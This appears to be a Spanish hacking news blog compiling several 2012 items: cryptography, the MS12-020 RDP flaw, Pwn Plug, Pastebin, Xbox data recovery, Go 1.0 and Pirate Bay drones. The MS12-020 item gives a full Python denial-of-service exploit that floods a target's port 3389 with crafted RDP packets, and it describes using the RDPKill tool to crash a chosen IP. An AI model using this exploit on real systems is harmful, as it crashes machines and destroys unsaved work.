ChulloHack

Nuestros amigos de Mundo Hacker TV regresan con un gran tema “Aprendiendo sobre criptografía, la codificación y cifrado” y un especial Black Hat Europe 2012 con Mundo Hacker TV en este tercer episodio de su segunda temporada nuestros amigos nos hablan sobre cifrado simétrico y cifrado asimétrico, la importancia del par de llaves, como funciona PGP (Pretty Good Privacy), RSA, DH/DSS, AES, tripleDES, Twofish, etc., ataques criptográficos, herramientas y utilidades que aplican técnicas criptográficas, como funciona la firma digital para garantizar integridad, autenticidad y el no repudio.

Pueden ver el video del episodio en este link.

Este fallo, es explotable, Microsoft ya publicó en marzo el boletín MS12-020 que soluciona los errores en RDP. Lo más grave de esta vulnerabilidad podría permitir la ejecución remota de código si un atacante envía una secuencia de paquetes RDP a un sistema afectado. De forma predeterminada, el protocolo de Escritorio remoto (RDP) no está habilitado en ningún sistema operativo Windows. Los sistemas que no tienen RDP habilitado no están expuestos.
Los riesgos de esta  vulnerabilidad tiene el potencial de causar estragos en las empresas, organizaciones gubernamentales y usuarios individuales, ya que permite a atacantes remotos caminar a la derecha en la red sin necesidad de autenticación, dijo Percoco. Mientras RDP está desactivado por defecto en la mayoría de los sistemas de Windows, los usuarios y administradores de pequeñas y medianas empresas a menudo se enciende para soporte técnico remoto. Muchos se olvidan de apagarlo.

Hemos encontrado una herramienta llamada RDPKill,dicha herramienta explota la vulnerabilidad de escritorio remoto tan solo poniendo en uno de los campos el target o IP objetivo en este caso el IP del escrito remoto al cual quremos atacar y en el otro campo pondremos el puerto remoto y darle clik al boton Kill , el objetivo de esta herramienta acaba causando un BSOD en el equipo remoto, el famoso BSDO la llamada Blue Screen of Death mas conocida como pantalla azul de la muerte,como sabemos existen 2 tipos de pantallas azules de la muerte , la mas perjudicial es la hace que cuando el núcleo del sistema operativo Windows XP no puede recuperarse de un error y la única acción que un usuario puede realizar es reiniciar el sistema perdiendo todo el trabajo no guardado, el estado de todos los programas ejecutándose en ese momento y poniendo en peligro la integridad del sistema de archivos y los archivos mismos creados mediante Windows, en este punto es posible perder toda la información en los discos duros gestionados por Windows y su sistema de archivos NTFS o FAT 16/FAT 32.

La otra forma de  tambien hemos encontrado es ejecutando el exploit de esta vulnerabilidad y ha sido probado en una maquina virtual  en WINXP SP3

El código del exploit:

# ms12-020 smaller
# I reduced the needed payload to DOS, the crashed is caused by buf2
# bp RDPWD!NM_Disconnect // crash is after this
#
# freenode #ms12-020

import socket
import sys
import time

#init
buf0 = “030000130ee000000000000100080000000000″.decode(‘hex’)
#MCS: Connection-initial
buf1 = “030001d602f0807f658201940401010401010101ff3019020400000000020

4000000020204000000000204000000010204000000000204000000010202ffff020

4000000023019020400000001020400000001020400000001020400000001020400

00000002040000000102020420020400000002301c0202ffff0202fc170202ffff0204

000000010204000000000204000000010202ffff0204000000020482013300050014

7c0001812a000800100001c00044756361811c01c0d800040008008002e00101ca0

3aa09040000ce0e000048004f005300540000000000000000000000000000000000

000000000000000004000000000000000c00000000000000000000000000000000

000000000000000000000000000000000000000000000000000000000000000000

00000000000000000000000000000000000001ca010000000000100007000100300

030003000300030002d003000300030002d0030003000300030003000300030002d

0030003000300030003000000000000000000000000000000000000000000000000

00004c00c000d0000000000000002c00c001b0000000000000003c02c00030000007

26470647200000000008080636c6970726472000000a0c0726470736e6400000000

00c0″.decode(‘hex’)

#payload
buf2 = “0300000802f08028″.decode(‘hex’)

package = buf0+buf1+buf2

HOST = sys.argv[1]
PORT = 3389
for i in range(10000):
print i
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(3)
s.connect((HOST,PORT))
try:
s.send(package)
rec = s.recv(1024)
except:
pass
s.close()
Al ejecutarlo la máquina Windows remota se reinicia.

La startup Pwnie Express ha puesto a la venta un curioso dispositivo denominado Pwn Plug que externamente pasa por un simple adaptador de corriente, pero en realidad se trata de una mini-computadora gobernada por Ubuntu Linux y cargada con un arsenal de herramientas de hacking. Un dispositivo que ahorra tiempo y costes en busca de vulnerabilidades en grandes redes y que ya está siendo probado por empresas del top-50 de Fortune y el Departamento de Defensa estadounidense.

Un director de seguridad de una compañía de seguros (aburrido de su cargo según cuenta) llamado Dave Porcello, comenzó en 2010 a construir un prototipo de este dispositivo que tras su éxito ha tomado forma como producto comercial.

El Pwn Plug toma su base del SheevaPlug fabricado por Globalscale, una computadora en miniatura de bajo consumo y base Linux que en su exterior parece un simple adaptador de corriente.

Sin embargo, su potencia es notable accediendo de forma remota a cualquier red de ordenadores una vez conectado. Altamente configurable, el dispositivo incluye todo un arsenal de herramientas de hacking y test de penetración enfocados a comprobación de vulnerabilidades en redes corporativas.

Pwnie Express ha logrado que grandes compañías como Bank of America prueben su artilugio. Repartido por sus oficinas regionales, expertos de seguridad desde la sede corporativa del banco pueden comprobar la red en busca de vulnerabilidades o para solucionar otro tipo de problemas en ellas. El sistema “puede ahorrar gran cantidad de dinero en cadenas que tienen miles de tiendas en retail como TJMaxx, cada una con su red de ordenadores”.

El dispositivo es ‘plug and play’ y ofrece una puerta trasera a las redes corporativas, en este caso como herramienta propia para aumentar la seguridad. El modelo básico cuesta 480 dólares. Por 250 dólares más, Pwnie Express vende la versión Elite con capacidad de acceso a redes móviles inalámbricas.

El dueño de la página web Pastebin.com planea aumentar su plantilla para poder controlar los datos que se publican en la página, informa la BBC.

Esta web es utilizada frecuentemente por usuarios que aseguran ser miembros de grupos de ‘hackers’ como Anonymous o LulzSec y donde publican datos sensibles de usuarios como contraseñas o cuentas de correo electrónico.

Pastebin.com ha aumentado su popularidad en los últimos meses entre los usuarios y los medios de comunicación.

La página web, adquirida en 2010 por Jeroen Vader, se ha convertido en la web de cabecera de grupos como Anonymous o LulzSec ya que en ella publican los datos de usuarios de aquellas bases de datos a las que atacan. Contraseñas, direcciones de correo electrónico, direcciones físicas y, en ocasiones, números de teléfonos son algunos datos revelados por estos grupos de ‘hacktivistas’.

Pero el dueño de Pastebin.com quiera acabar con esa “mala imagen” de su web. Para ello, Vader quiere aumentar su plantilla para podercontrolar que ese tipo de información sensible no se cuelgue en su página y, de ser así, sea retirada inmediatamente.

Pese a reconocer que tras la utilización de Pastebin.com por parte de estos grupos de ‘hackers’ ha ayudado a situarse en 17 millones de usuarios únicos mensuales, Vader asegura que actualmente recibeuna media de 1.200 denuncias por abuso al día a través del sistema de notificación de Pastebin en el lugar o por correo electrónico.

“Estoy buscando contratar a más personal para controlar los contenidos de la web, no sólo los artículos denunciados. Esperamos que esto aumente la velocidad en la que se extraiga la información sensible”, asegura el dueño de Pastebin a la BBC.

Aunque Pastebin pide a sus miembros información sensible como listas de contraseñas, códigos fuente o información personal, los últimos mensajes publicados en Pastebin.com incluían este tipo de información de losataques a compañías de seguridad como Panda, Stratfor o Think Tank.

Incluso, también se pudieron encontrar las direcciones de correo electrónico y contraseñas de los usuarios del sitio de pornografía YouPorn.

Lo han descubierto en la Drexel University de Filadelfia: con unas pocas modificaciones sencillas y habilidades de hacker se puede extraer información personal de una Xbox de segunda mano.

Todos aquellos que hayan vendido, cambiado o regalado (o les hayan robado) una Xbox 360, corren el peligro de que sus datos hayan sido extraídos de la misma. Ashley Podhradski, investigadora de la universidad de Drexel, Filadelfia, es una de las personas que han encontrado este fallo de seguridad en las consolas de Microsoft.

Con pocas habilidades pueden robarnos mucho dinero

“Microsoft hace un gran trabajo protegiendo su información“, ha dicho. “Pero no hacen casi nada para proteger la información de los usuarios“. Ella y unos compañeros compraron una Xbox 360 de segunda mano directamente desde la empresa norteamericana, una que había sidoformateada y reseteada hasta dejarla en, supuestamente, el mismo estado en el que salió de fabrica, y usando software gratuito consiguieron leer el contenido del disco duro de la consola, encontrando, eventualmente, los detalles de la tarjeta de crédito y la información personal de su dueño previo.

Por lo visto esto no es sorprendente para alguien que haya trabajado en un departamento de informática que haya tenido relaciones con Windows y Microsoft. “Cuando formateas tu ordenador en un sistema Windows te dicen que todos tus datos van a ser borrados. Esto en realidad no es cierto - la información todavía está disponible“, ha dicho Ashley. ¿Cómo se podría proteger mejor esa información? Podhradsky sugiere conectar el disco duro de la consola al ordenador y usar programas de saneamiento que lo limpien de verdad.

Otra forma incluso más sensata, segun dicen en Lazygamer, es no poner los datos de la tarjeta de crédito en la consola, y en su lugar comprar tarjetas prepago y similares, de tal forma que la información se quede sana y salva al no ser comprometida de forma virtual, y al mismo tiempo se pueden encontrar ofertas más baratas que comprar juegos o puntos directamente.

El día de hoy luego de poco más de dos años, ha sido publicada por parte de la gigante de las búsquedas por internet, la primera versión estable de “Go“, el nuevo lenguaje de programación de Google, el cual cuenta con soporte nativo para usuarios de Windows, Linux, FreeBSD y Mac OS X, siendo el primero de su clase en contar con esto.

Según sus responsables, “Go” está basado en el tradicional lenguaje C pero siendo mucho más moderno, fácil de utilizar y contando con multipropósito para la computación en red y multinúcleo, siendo esta la mayor diferencia con su hermano “Dart“, el otro lenguaje de programación de Google, el cual está dirigido únicamente a la creación de aplicaciones web.

La versión 1.0 de “Go” ya está disponible a través de su portal oficial en este enlace, y sus responsables aseguran que cada nueva adición que realicen al lenguaje no “romperá” los programas que hayan sido creados o desarrollados utilizando Go 1.0, ya que seguirá compilándose y corriendo mientras se mantenga dicha versión, inclusive cuando actualicen y corrijan fallos lanzando versiones 1.1 o 1.2, por mencionar algunas. Aunque “Go” está basado o inspirado en C, también cuenta con ideas de Pascal, Limbo y Newsqueak.

Linus Torvalds, creador del kernel Linux, ha salido en defensa de Android, acusado por Microsoft de infringir diversas patentes de su propiedad, algunas de las cuales les reportan más beneficios a los de Redmond que su Windows Phone.

En este caso, la patente que rechaza Torvalds está relacionada con un sistema que permite nombres de archivos largos en sistemas de archivos no preparados para ello, como FAT, y que según Microsoft les pertenece, después de registrar esa patente años atrás.

Por su parte, Torvalds desmiente tal extremo, mostrando como prueba unas conversaciones sobre ese mismo tema que hace veinte años mantuvo en las listas de correo de desarrolladores de Linux.

La patente toca de lleno el caso que enfrenta en los juzgados a Microsoft y Motorola, propiedad de Google, y de ser válida la prueba aportada por Torvalds, la ahora posible victoria de los primeros podría esfumarse rápidamente.

Lo ‘hackers’ y programadores siguen trabajando para vulnerar los sistemas de seguridad de PS Vita y parece que están un paso más cerca de conseguirlo. Un vídeo demuestra que un ‘hacker’ identificado como Davee ha conseguido acceso al modo kernel de PSP en PS Vita, lo que le permite ejecutar software casero en la consola y copias de juegos de PSP.

Lo que vemos en el vídeo de apertura es la constatación de lo anunciado por The Pirate Bay hace unos días. El futuro de las P2P y el intercambio de archivos podría encontrarse en el espacio de manera literal, con mini servidores en drones que hacen de nodos, cambiando, mudándose de espacio y lugar ante la censura existente. El vídeo es una realidad creada por el proyecto Electronic Countermeasures, el primer “vuelo” de intercambio de archivos en drones.

Y es que aunque muchos pensaran que se trataba de una broma o un futuro muy lejano, la posibilidad de utilizar parte del sistema de alojamiento a través de drones con GPS controlados es real. Un drone-nodo que consigue 100 Mbps a distancias de hasta 50 Km y que muta los lugares de alojamiento, con la única posibilidad de “derribo” tumbando a las máquinas en el espacio.

El vídeo muestra hasta cinco “enjambres” en funcionamiento. Una idea que partió hace un tiempo de Liam Young como método para evitar la censura actual en torno al intercambio de archivos. Así surgió el  proyecto Electronic Countermeasures, algo así como un Napster aéreo o un The Pirate Bay en el aire. Young lo contaba hace unas horas para TorrentFreak:

Partimos de la idea de una infraestructura de elementos nómadas con enjambres robóticos, de esta forma reconstruimos y programamos aviones no tripulados para la transmisión local de su propia red wifi, como si fuera un Nápster aéreo.

Estos enjambres van en formación, con la difusión de su propia red pirata. Luego se dispersan y son capaces de escapar a la detección y vuelven a reagruparse en otros lugares.

Lo que Young explica es un sistema que permite a los usuarios de la red compartir los datos con la ayuda de drones que vuelan de forma autónoma sobre una ciudad. Según Young:

Los usuarios puede subir archivos, fotos y compartir datos con otros mientras los aviones flotan por encima de los espacios públicos significativos de una ciudad. El enjambre se convierte en una cadena de televisión pirata, una infraestructura móvil donde los transeúntes puedan interactuar con ellos. La red se transmite utilizando diferentes configuraciones de hardware que van desde módulos Linux hasta rotures inalámbricos o memorias USB para el almacenamiento de archivos.

Quizá lo peor sea el precio y coste de la infraestructura si la comparamos con los tradicionales centros de intercambio de archivos. Una inversión costosa si tenemos en cuenta que solo cada drone cuesta alrededor de 1.500 euros para su construcción. Por esta razón ahora se busca financiación, patrocinadores y apoyo financiero al proyecto con la esperanza de que la idea crezca y se amplíe la cobertura.

No sólo eso, de tener éxito, este tipo de proyectos podría implementarse como soporte P2P en la comunicación de manifestantes o activista en enclaves donde impera la censura y el acceso a la red. Un futuro que deja de serlo viendo estas imágenes. El sueño de The Pirate Bay podría estar más cerca de lo que creíamos.

«The Pirate Bay» continúa buscando formas de garantizar la libertad de su servicio y su último proyecto es utilizar servidores aéreos. Desde la página web han explicado que su intención sería utilizar aviones no tripulados con GPS que incorporarían sus servidores. Con este sistema podrían mantener el servicio de forma libre y obligarían a utilizar aviones para atacar sus sistemas en caso de que quieran paralizarlo, lo que definen como «un acto de guerra».

Cuando una sentencia en Suecia confirmaba penas de cárcel para varios de los fundadores de la página, quienes aseguran que no piensas abandonar sus actividades. En un comunicado explicaron que el servicio era como el hierro, se endurecía con cada golpe, y parece que los responsables de la web están convencido de ello.

En los últimos meses, desde la web han realizado cambios importantes para proteger su servicio. El cambio más destacado fue el de abandonar los archivos torrent y apostar por los enlaces magnet. Sabiendo que dicha variación no protege de forma absoluta al servicio ante un posible cierre, la compañía está planeando una forma para hacer que sus servidores estén fuera de peligro y control. Una de las preocupaciones de los responsables siempre ha sido donde poner sus servidores. Siempre han buscado un emplazamiento secreto que protegiese el sistema y ahora quiere llevar un paso más allá esa idea.

En el blog oficial han explicado que su idea es llevar sus servidores al aire. El proyecto es utilizar pequeños aviones no tripulados para equiparlos con los servidores que mantendrán los contenidos del servicio. Estos aviones, que contarían con sistemas de GPS, se controlarían por medio de sistemas de radio y se situarían a varios kilómetros de la tierra. Estos equipos estarían fuera del alcance de las autoridades y permitirían a sus responsables regular su posición y cobertura.

Desde «The Pirate Bay» han destacado que con este sistema podrían mantener a salvo sus servidores, ya que para alterar su funcionamiento se tendría que atacar a los aviones. Según sus responsables, en caso de producirse un ataque de este tipo se podría considerar un «verdadero acto de guerra», por lo que consideran que en principio la seguridad de los servidores estaría garantizada. No es la primera iniciativa de este tipo que tiene lugar en los últimos meses.

Un grupo de «hackers» ya ha expresado su deseo de enviar al espacio un satélite con el que tener conexión a Internet sin ningún tipo de censura por parte de las autoridades. Este proyecto, denominado Hackerspace Global Grid, fue presentado en el Chaos Communication Congress de Berlín. La idea de «The Pirate Bay» parece más factible por el hecho de que enviar al espacio un satélite es más complejo.

Sus responsables han asegurado que por el momento la iniciativa de utilizar aviones para alojar sus servidores solo está empezando, por lo que falta mucho desarrollo. Sin embargo se han mostrado esperanzados en que en un futuro próximo el proyecto pueda llevarse a cabo y contribuya a mejorar la resistencia de su sistema.